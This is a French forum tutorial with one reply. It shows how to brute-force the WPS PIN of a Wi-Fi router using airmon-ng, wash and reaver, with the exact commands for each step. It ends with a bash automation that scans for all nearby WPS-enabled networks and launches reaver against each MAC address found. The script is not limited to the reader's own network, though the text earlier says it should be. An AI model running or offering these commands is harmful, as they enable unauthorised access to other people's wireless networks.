Annonce

Réduire
Aucune annonce.

Crack Wifi va WPS

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Crack Wifi va WPS

    Tutoriel sur le crack wifi WPS

    Wi-Fi Protected Setup (WPS) est un standard de réseau local sans fil simple et sécurisé. Conçu par la Wi-Fi Alliance, il a été lancé début 2007.
    Le but du protocole WPS est de simplifier la phase de configuration de la sécurité des réseaux sans fil1. Il permet à des particuliers ayant peu de connaissances sur la sécurité de configurer un accès WPA, supporté par les appareils Wi-Fi.
    Ce standard met l'accent sur l'utilisabilité et la sécurité, et le concept se décline en quatre façons d'établir un réseau domestique. L'utilisateur voulant ajouter un périphérique au réseau peut utiliser au choix :
    1. la méthode PIN (Personal Identification Number), un numéro à lire sur une étiquette (ou un écran) du nouvel appareil, et à reporter sur le « représentant » du réseau (le point d'accès ou le registrar).
    2. la méthode PBC, où l'utilisateur presse un bouton (physique ou virtuel), à la fois sur le point d'accès et sur le nouvel appareil.
    3. la méthode NFC, où l'utilisateur approche le nouvel appareil du point d'accès pour établir une communication en champ proche entre eux.
    4. la méthode USB (Comme D-link le fait pour la plupart des clés usb wifi), où l'utilisateur se sert d'une clé USB pour transférer les données entre le nouvel appareil et le point d'accès.
    Seules les trois premières méthodes (PIN/PBC/NFC) ont obtenu la Wi-Fi Protected Setup Certification[réf. nécessaire].
    Une grave vulnérabilité de la méthode PIN a été démontrée le 26 décembre 2011 par Stefan Viehböck2,3. Bien que la publication présentant la vulnérabilité ne contient pas de code source, elle a permis à d'autres développeurs d'écrire et publier une implémentation de l'attaque4.


    Dans ce tuto nous apprendrons comment brute forcer ce code PIN pour obtenir rapidement un accès au réseau wifi.

    Outils nécessaires :

    Une carte wifi capable de se mettre en mode monitoring
    Reaver (logiciel installé par défaut dans Backtrack)
    Wash (logiciel installé par défaut dans Backtrack)
    Un réseau wifi qui vous appartiens avec le WPS d'activé
    Un paire de main

    Étape 1 :
    Passer sa carte en mode monitoring

    airmon-ng start wlan0

    Maintenant lorsque vous faite un ifconfig vous devez avoir une nouvelle interface nommé mon0

    Étape 2 : Rechercher notre réseau wifi et voir si le WPS est actif
    Pour cela nous allons utiliser l'outil wash :

    wash -o mac.txt -i mon0

    le -o va servir à envoyer le résultat dans le fichier mac.txt (il se crée si il n'existe pas)
    le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
    Vous devriez avoir quelque chose de similaire dans votre fichier

    wash.png


    Dans mon cas j'utiliserais l'adresse mac 00:25:15:5F:E1:XX de ma Neufbox

    Étape 3 : Bruteforce du code PIN de notre borne wifi
    Pour cela nous allons utiliser l'outil reaver :

    reaver -i mon0 -a -vv -b 00:25:15:5F:E1:XX

    le -i va servir a dire sur quel interface lancer la recherche de réseau wifi avec le WPS actif.
    le -a va servir à choisir le mode le plus adapté pour brute forcer le code PIN
    le -vv va servir à avoir un mode vraiment vraiment verbeux (il nous raconte toute sa vie en détail ^^)
    le -b va servir à choisir l'adresse mac à attaquer.

    Il va essayer au fur et a mesure les différents code PIN jusqu'à trouver le précieux.


    reaver 1.jpg

    reaver 2.jpg


    J'espère que ce tuto vous aura fait découvrir de nouveau outils.

    Pour ceux que qui serait intéressé par une automatisation , j'ai développé un script (il vaut ce qu'il vaut)

    Dans le premier fichier autrocrack.sh

    Code:
    echo Passage de la carte wlan0 en mode monitoring
    airmon-ng start wlan0
    echo ________________________________________________
    echo Recherche des Reseaux potentiellement crackable
    echo                                                       
    
    gnome-terminal -e ./wash.sh 
    sleep 1
    gnome-terminal -e ./boucle.sh
    sleep 5
    gnome-terminal -e ./boucle2.sh
    sleep 5
    gnome-terminal -e ./boucle3.sh
    sleep 5
    gnome-terminal -e ./boucle4.sh
    sleep 5
    gnome-terminal -e ./boucle5.sh
    sleep 60
    Dans le deuxième fichier wash.sh
    Code:
     wash -omac.txt -i mon0 | grep -o -E "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}" mac.txt >mac2.txt
    sleep 60
    Dans le troisième fichier boucle.sh
    Code:
    compteur=0
    while read line 
    do compteur=$((compteur+1))
            var="var${compteur}"
            export $var="$line"
    done < mac2.txt
    
    reaver -i mon0 -a -vv -b $var1
    Si vous avez compris le fonctionnement du dernier fichier vous devrez créer les fichiers boucle2.sh jusqu'à boucle5.sh
    Reprenez uniquement le dernier code est incrémenter de 1 la dernière variable.

    exemple pour boucle2.sh nous aurons uniquement la ligne

    reaver -i mon0 -a -vv -b $var2 qui sera modifié


    Pour les définitions je tiens mes sources de wikipédia et pour le tuto je me suis appuyer sur le site k0n1k

    Je reste à votre entière disposition pour vos questions.

  • #2
    Très bon tuto, merci pour le partage, je ne connaissais pas reaver

    Commentaire

    Chargement...
    X